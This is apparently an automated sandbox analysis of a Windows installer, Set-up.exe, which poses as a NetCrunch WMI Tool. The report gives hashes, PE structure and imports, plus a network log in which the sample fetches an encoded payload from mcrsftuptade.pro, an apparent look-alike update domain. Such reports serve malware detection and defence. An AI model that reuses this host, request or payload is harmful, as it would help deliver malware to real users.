Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.3.7.5.8.9.9.0.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.b.f.a.c.3.3.-.b.7.4.e.-.4.b.7.5.-.8.9.6.4.-.5.2.e.4.9.3.7.c.c.6.6.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.8.f.1.d.4.9.-.b.3.8.6.-.4.1.0.c.-.a.1.a.b.-.2.e.2.e.3.9.1.1.c.f.2.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.5.c.-.0.0.0.1.-.0.0.1.8.-.7.d.9.1.-.f.0.8.b.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.b.e.e.b.f.9.6.7.c.b.7.5.7.3.a.a.9.7.d.c.2.a.8.8.f.1.7.f.f.3.c.5.0.0.0.0.f.f.f.f.!.0.0.0.0.a.1.f.0.7.b.b.4.5.0.1.9.c.a.d.2.a.d.b.0.0.6.7.0.1.6.5.f.7.1.0.d.a.9.4.9.2.5.1.2.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.2././.2.5.:.2.0.:.0.6.:.0.8.!.

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.756655906156863
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	25'181'696 bytes
MD5:	93704dcb189997351ec039c6e5f1aa41
SHA1:	d1bcc20f331f881d46cae1a13b281c127d9d6ae0
SHA256:	6be08c94108deb529fc50d4fd76c1a71e4a1329cbc618d550dccde597dc4f09e
SHA512:	5a24b9e04052badc44cee42cf8516b37256dc6af937f8594c3d86a5a821ed3857bf0e3b403d6df9ecd62d39fdb0693a629348912a619698e35b48e7b05516ba3
SSDEEP:	393216:7597Jjobwtg8j0Cu44SY4WiacYatTGcRSVtdNjLtp32rG:58bwW8ZyVVtdlLtpa
TLSH:	91478D43B3C4543ED0671A3A683B96A0AD3FFE116E228A4737AC3D5C5FB5640393A647
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

Entrypoint:	0x143ab94
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DEBUG_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x55C4BDEB [Fri Aug 7 14:17:15 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	f40af903c804980b0d67c326cebd69b3

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x11a9000	0x92	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1199000	0x619e	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1339000	0x5e3200	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x2a83cf44	0x6140
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11ac000	0x18c998	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x11ab000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x119a1f0	0xef8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x11a0000	0x873a	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x102e6ac	0x102e800	f8e428436f1d7e5dc77bb4bf3dbd74d7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x1030000	0xac50	0xae00	d24957f058c2cbcabe470b62ea42d4c0	False	0.4983836206896552	data	6.44795831227972	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x103b000	0x4b848	0x4ba00	e9b583f39f04c2861588ed40b9ada227	False	0.32120674070247934	data	4.9865086470398285	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x1087000	0x111f5c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x1199000	0x619e	0x6200	ac9c9c183f7007799aee4fe0540fe868	False	0.29994419642857145	data	5.522490176718458	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0x11a0000	0x873a	0x8800	1e896af8060d0fd20998b3fc940891ee	False	0.24457146139705882	data	5.127167323177517	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x11a9000	0x92	0x200	a2e14efb7d4f6bd7611abf3b2b3a2b5d	False	0.2578125	data	1.8840316901530774	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x11aa000	0x670	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x11ab000	0x5d	0x200	bbf834c5e1c2e8d68dc3b87c5bab071e	False	0.1953125	data	1.4440055777400933	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11ac000	0x18c998	0x18ca00	4c15d92165165211955327f402ab9fa8	False	0.4614231651827923	data	6.631496707978542	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x1339000	0x5e3200	0x5e3200	5cf8dbc3fa5d55c15bf8d54b904c3bfb	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	MessageBoxA, CharNextW, LoadStringW
kernel32.dll	Sleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsDBCSLeadByteEx, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetConsoleOutputCP, GetConsoleCP, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, SetFilePointer, SetEndOfFile, ReadFile, GetFileType, GetFileSize, CreateFileW, GetStdHandle, CloseHandle
kernel32.dll	GetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
user32.dll	SetClassLongW, GetClassLongW, SetWindowLongW, GetWindowLongW, CreateWindowExA, CreateWindowExW, wvsprintfA, wvsprintfW, keybd_event, WindowFromPoint, WindowFromDC, WinHelpW, WaitMessage, VkKeyScanW, ValidateRect, UpdateWindow, UnregisterClassW, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenuEx, TrackPopupMenu, ToUnicode, ToAsciiEx, ToAscii, TabbedTextOutA, TabbedTextOutW, SystemParametersInfoW, SubtractRect, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextA, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenuInfo, SetMenuDefaultItem, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardViewer, SetClipboardData, SetCaretPos, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutA, SendMessageTimeoutW, SendMessageA, SendMessageW, SendDlgItemMessageW, ScrollWindowEx, ScrollWindow, ScrollDC, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassA, RegisterClassW, RedrawWindow, PtInRect, PostThreadMessageA, PostThreadMessageW, PostQuitMessage, PostMessageA, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, OffsetRect, OemToCharBuffA, OemToCharA, NotifyWinEvent, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MoveWindow, MessageBoxA, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LockWindowUpdate, LoadStringW, LoadMenuW, LoadKeyboardLayoutW, LoadImageA, LoadImageW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsMenu, IsIconic, IsDialogMessageA, IsDialogMessageW, IsClipboardFormatAvailable, IsChild, IsCharAlphaNumericW, IsCharAlphaA, IsCharAlphaW, InvalidateRgn, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowTextW, GetWindowRgn, GetWindowRect, GetWindowPlacement, GetWindowDC, GetUpdateRgn, GetUpdateRect, GetTopWindow, GetTabbedTextExtentA, GetTabbedTextExtentW, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMessageExtraInfo, GetMessageA, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemRect, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenuDefaultItem, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgItem, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardFormatNameW, GetClipboardData, GetClientRect, GetClassNameA, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCaretPos, GetCapture, GetAsyncKeyState, GetAncestor, GetActiveWindow, FrameRect, FindWindowExW, FindWindowA, FindWindowW, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EndMenu, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextA, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DragDetect, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DeferWindowPos, DefWindowProcA, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIconIndirect, CreateIcon, CreateCaret, CreateAcceleratorTableW, CountClipboardFormats, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, ChildWindowFromPointEx, ChildWindowFromPoint, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, ChangeClipboardChain, CallWindowProcA, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, BeginDeferWindowPos, AttachThreadInput, CharLowerBuffA, CharUpperBuffA, CharUpperA, CharToOemBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	WidenPath, UpdateColors, UnrealizeObject, TextOutA, TextOutW, StrokePath, StrokeAndFillPath, StretchDIBits, StretchBlt, StartPage, StartDocA, StartDocW, SetWorldTransform, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextJustification, SetTextCharacterExtra, SetTextColor, SetTextAlign, SetStretchBltMode, SetRectRgn, SetROP2, SetPolyFillMode, SetPixelV, SetPixel, SetPaletteEntries, SetMapMode, SetGraphicsMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetArcDirection, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SelectClipPath, ScaleWindowExtEx, SaveDC, RoundRect, RestoreDC, ResizePalette, ResetDCW, Rectangle, RectVisible, RectInRegion, RealizePalette, PtVisible, PtInRegion, PolylineTo, Polyline, Polygon, PolyPolyline, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PathToRegion, PatBlt, OffsetWindowOrgEx, OffsetRgn, OffsetClipRgn, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWindowExtEx, GetWinMetaFileBits, GetViewportOrgEx, GetTextMetricsA, GetTextMetricsW, GetTextFaceA, GetTextExtentPointW, GetTextExtentPoint32A, GetTextExtentPoint32W, GetTextExtentExPointA, GetTextExtentExPointW, GetTextColor, GetTextCharacterExtra, GetTextAlign, GetSystemPaletteEntries, GetStretchBltMode, GetStockObject, GetRgnBox, GetRegionData, GetROP2, GetPixel, GetPaletteEntries, GetOutlineTextMetricsA, GetObjectType, GetObjectA, GetObjectW, GetNearestPaletteIndex, GetNearestColor, GetMapMode, GetFontData, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetCurrentObject, GetClipRgn, GetClipBox, GetCharABCWidthsW, GetBrushOrgEx, GetBkMode, GetBkColor, GetBitmapBits, GdiFlush, FrameRgn, FillRgn, FillPath, ExtTextOutA, ExtTextOutW, ExtSelectClipRgn, ExtFloodFill, ExtCreateRegion, ExtCreatePen, ExcludeClipRect, EqualRgn, EnumFontsW, EnumFontFamiliesExW, EnumFontFamiliesW, EnumEnhMetaFile, EndPath, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, DPtoLP, CreateSolidBrush, CreateRoundRectRgn, CreateRectRgnIndirect, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePen, CreatePatternBrush, CreatePalette, CreateICW, CreateHatchBrush, CreateHalftonePalette, CreateFontIndirectA, CreateFontIndirectW, CreateFontA, CreateFontW, CreateEnhMetaFileW, CreateEllipticRgnIndirect, CreateEllipticRgn, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, CombineRgn, CloseFigure, CloseEnhMetaFile, Chord, BitBlt, BeginPath, ArcTo, Arc, AngleArc, AbortDoc
version.dll	VerQueryValueA, VerQueryValueW, GetFileVersionInfoSizeA, GetFileVersionInfoSizeW, GetFileVersionInfoA, GetFileVersionInfoW
mpr.dll	WNetAddConnection2W
kernel32.dll	lstrlenW, lstrcmpiW, lstrcmpA, lstrcmpW, WriteProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, UnmapViewOfFile, TryEnterCriticalSection, TerminateThread, TerminateProcess, SystemTimeToFileTime, SwitchToThread, SuspendThread, SleepEx, Sleep, SizeofResource, SetUnhandledExceptionFilter, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetFileAttributesA, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SearchPathA, ResumeThread, ResetEvent, RemoveDirectoryA, RemoveDirectoryW, ReleaseMutex, ReadProcessMemory, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, QueryDosDeviceW, IsDebuggerPresent, OutputDebugStringW, OpenProcess, OpenFileMappingA, OpenFileMappingW, MultiByteToWideChar, MulDiv, MoveFileExW, MapViewOfFile, LockResource, LocalSize, LocalFree, LocalAlloc, LoadResource, LoadLibraryExA, LoadLibraryA, LoadLibraryW, LeaveCriticalSection, LCMapStringW, IsValidLocale, IsDBCSLeadByte, IsBadReadPtr, InitializeCriticalSectionAndSpinCount, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalSize, GlobalMemoryStatus, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetWindowsDirectoryA, GetWindowsDirectoryW, GetVolumeInformationW, GetVersionExA, GetVersionExW, GetVersion, GetUserDefaultLCID, GetTimeZoneInformation, GetTimeFormatW, GetTickCount, GetThreadPriority, GetThreadLocale, GetThreadContext, GetTempPathA, GetTempPathW, GetSystemTime, GetSystemInfo, GetSystemTimes, GetSystemDirectoryW, GetStringTypeExA, GetStringTypeExW, GetStdHandle, GetProfileStringA, GetProfileStringW, GetProfileIntW, GetProcAddress, GetPriorityClass, GetModuleHandleA, GetModuleHandleW, GetModuleFileNameA, GetModuleFileNameW, GetLogicalDriveStringsW, GetLocaleInfoA, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileType, GetFileTime, GetFileSize, GetFileAttributesA, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceA, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryA, GetCurrentDirectoryW, GetComputerNameA, GetComputerNameW, GetCommandLineA, GetCommandLineW, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageA, FormatMessageW, FlushInstructionCache, FindResourceA, FindResourceW, FindNextFileA, FindNextFileW, FindFirstFileA, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, FatalAppExitA, ExpandEnvironmentStringsA, ExpandEnvironmentStringsW, ExitThread, ExitProcess, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DuplicateHandle, DeleteFileA, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessA, CreateProcessW, CreatePipe, CreateMutexA, CreateMutexW, CreateFileMappingA, CreateFileMappingW, CreateFileA, CreateFileW, CreateEventA, CreateEventW, CreateDirectoryA, CreateDirectoryW, CopyFileA, CopyFileW, CompareStringA, CompareStringW, CloseHandle, Beep
advapi32.dll	SetSecurityDescriptorDacl, RegUnLoadKeyW, RegSetValueExA, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExA, RegQueryValueExW, RegQueryInfoKeyA, RegQueryInfoKeyW, RegOpenKeyExA, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyA, RegEnumKeyExW, RegDeleteValueA, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExA, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey, OpenProcessToken, InitializeSecurityDescriptor, GetUserNameA, GetUserNameW, GetTokenInformation, FreeSid, AllocateAndInitializeSid
SHFolder.dll	SHGetFolderPathW
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
oleaut32.dll	CreateErrorInfo, GetErrorInfo, SetErrorInfo, GetActiveObject, VariantInit, SysFreeString
ole32.dll	CreateStreamOnHGlobal, OleRegEnumVerbs, IsAccelerator, ReleaseStgMedium, OleDraw, OleSetMenuDescriptor, OleFlushClipboard, OleGetClipboard, OleSetClipboard, DoDragDrop, RevokeDragDrop, RegisterDragDrop, OleUninitialize, OleInitialize, CreateDataAdviseHolder, CoTaskMemFree, CoTaskMemAlloc, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoInitializeSecurity, CoGetClassObject, CoUninitialize, CoInitializeEx, CoInitialize, IsEqualGUID
comctl32.dll	InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_AddMasked, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll	SHGetFileInfoW, ShellExecuteExA, ShellExecuteA, ShellExecuteW, Shell_NotifyIconW, ExtractIconW, ExtractAssociatedIconW
comdlg32.dll	PrintDlgW, ChooseFontW, ChooseColorW, GetSaveFileNameA, GetSaveFileNameW, GetOpenFileNameW
wsock32.dll	WSACleanup, WSAStartup, WSAGetLastError, gethostbyname, socket, setsockopt, sendto, send, select, recvfrom, recv, ioctlsocket, inet_addr, htons, connect, closesocket, bind
kernel32.dll	RtlUnwind
shell32.dll	SHGetPathFromIDListA, SHGetSpecialFolderLocation, SHGetMalloc
user32.dll	EnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
msvcrt.dll	memset, memcpy
winspool.drv	SetPrinterW, OpenPrinterW, GetPrinterW, EnumPrintersW, DocumentPropertiesW, DeviceCapabilitiesW, ClosePrinter
winspool.drv	GetDefaultPrinterW
kernel32.dll	GetStringTypeW
kernel32.dll	GetVersionExW
winmm.dll	timeGetTime, timeEndPeriod, timeBeginPeriod, PlaySoundW, mciSendCommandW, mciGetErrorStringW
activeds.dll	ADsFreeEnumerator
kernel32.dll	GetProcAddress, LoadLibraryA, GetModuleHandleA
oleacc.dll	LresultFromObject
GDI32.DLL	GetRandomRgn
winspool.drv	DocumentPropertiesW
kernel32.dll	MulDiv
iphlpapi.dll	GetAdaptersInfo
ole32.dll	CoCreateInstance, CoInitialize

Name	Ordinal	Address
GetHardwareID	3	0x13ba910
TMethodImplementationIntercept	2	0x4e2048
madTraceProcess	1	0x4b4a1c

Description	Data
CompanyName	AdRem Software, Inc.
FileDescription	NetCrunch WMI Tool
FileFlagPrivate	False
FileSubType	0
FileVersion	8.0.0.16
InternalName	NetCrunch WMI Tool 8
LegalCopyright	2014 (c) AdRem Software Inc., all rights reserved
OriginalFilename	NCWmiTools
ProductName	NetCrunch WMI Tool
ProductVersion	8.0.0.0
Translation	0x0409 0x04e4

Language of compilation system	Country where language is spoken	Map
English	United States
German	Germany
Polish	Poland
French	France
English	Great Britain
Czech	Czech Republic

Timestamp	Bytes transferred	Direction	Data
May 10, 2025 08:05:35.466841936 CEST	101	OUT	GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1 Host: mcrsftuptade.pro Connection: close
May 10, 2025 08:05:35.760193110 CEST	1358	IN	HTTP/1.1 200 OK Date: Sat, 10 May 2025 06:05:35 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gGUm6Rde7pX%2FV2Zq6yzRWIK%2BL2%2FgdWzOgHE3sznBljNAYRNw6Yr3zUgJxXscaET75R5%2F%2BFQryI7KnDQ4S%2FSdolsmLfzwR%2B5ywdHRlLDVs%2B3dBZ77tPDvv%2FaXij8X3x3M%2BaKY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} speculation-rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 93d73ee929fd7867-PHX server-timing: cfL4;desc="?proto=TCP&rtt=141991&min_rtt=141991&rtt_var=70995&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=101&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 33 37 64 36 0d 0a 51 78 64 51 45 77 35 69 54 42 42 64 49 67 49 58 55 47 31 6f 57 67 38 51 48 79 4a 49 46 77 67 54 61 47 56 37 58 56 42 68 56 47 6c 75 64 6c 74 57 55 46 35 57 58 47 52 32 57 6b 4e 62 56 46 4a 75 62 31 56 4c 55 45 41 52 63 46 68 44 55 78 45 73 47 6b 45 51 43 77 55 56 46 55 4a 64 49 67 49 58 55 56 6c 47 56 6c 70 58 48 57 56 41 55 42 42 4d 47 45 49 56 58 42 45 36 47 6c 64 75 62 56 63 42 46 52 34 52 63 42 6f 50 45 47 31 6f 64 56 68 52 55 6d 78 6b 61 58 56 65 57 31 35 62 56 32 39 63 65 31 31 41 58 6c 6c 63 46 32 46 4c 55 32 52 70 5a 30 4a 52 53 78 64 32 55 6e 52 5a 46 78 34 54 51 42 73 4e 41 78 38 69 53 46 73 51 43 78 5a 61 58 30 42 63 62 56 30 62 56 30 6c 52 47 30 6f 65 53 43 4a 57 46 77 67 54 56 6d 56 72 55 51 73 69 46 42 64 43 45 77 34 62 61 32 35 2f 62 31 74 55 58 6d 31 6f 66 6c 68 64 56 47 78 64 61 57 35 79 58 45 74 59 58 31 59 67 65 6c 42 47 55 47 68 6c 59 6b 46 57 63 68 68 78 55 30 56 56 47 78 73 51 52 79 49 43 42 42 34 54 52 46 63 56 43 42 46 6a 55 45 64 64 58 46 45 58 55 6b 70 57 [TRUNCATED] Data Ascii: 37d6QxdQEw5iTBBdIgIXUG1oWg8QHyJIFwgTaGV7XVBhVGludltWUF5WXGR2WkNbVFJub1VLUEARcFhDUxEsGkEQCwUVFUJdIgIXUVlGVlpXHWVAUBBMGEIVXBE6GldubVcBFR4RcBoPEG1odVhRUmxkaXVeW15bV29ce11AXllcF2FLU2RpZ0JRSxd2UnRZFx4TQBsNAx8iSFsQCxZaX0BcbV0bV0lRG0oeSCJWFwgTVmVrUQsiFBdCEw4ba25/b1tUXm1oflhdVGxdaW5yXEtYX1YgelBGUGhlYkFWchhxU0VVGxsQRyICBB4TRFcVCBFjUEddXFEXUkpWIkUZSRNaGw0QUVxkVgoTGBtHEAkiZGl+XldYW25vR1daVV1RZWtxW3JXWFcRcFxBbm9VS1BAEXBYQ1MRLBpBEAsFFRVCXSICF1FZRlZaVx1lQFAQTBhCFVwROhpXbm1XARUeEXAaDxBtaHVYUVJsZGl1XlteW1dvXHtdQF5ZXBdnXXNMVFBdUWVrZ0BlShV2UEBYFR4RdBoPAx0WSVkQ
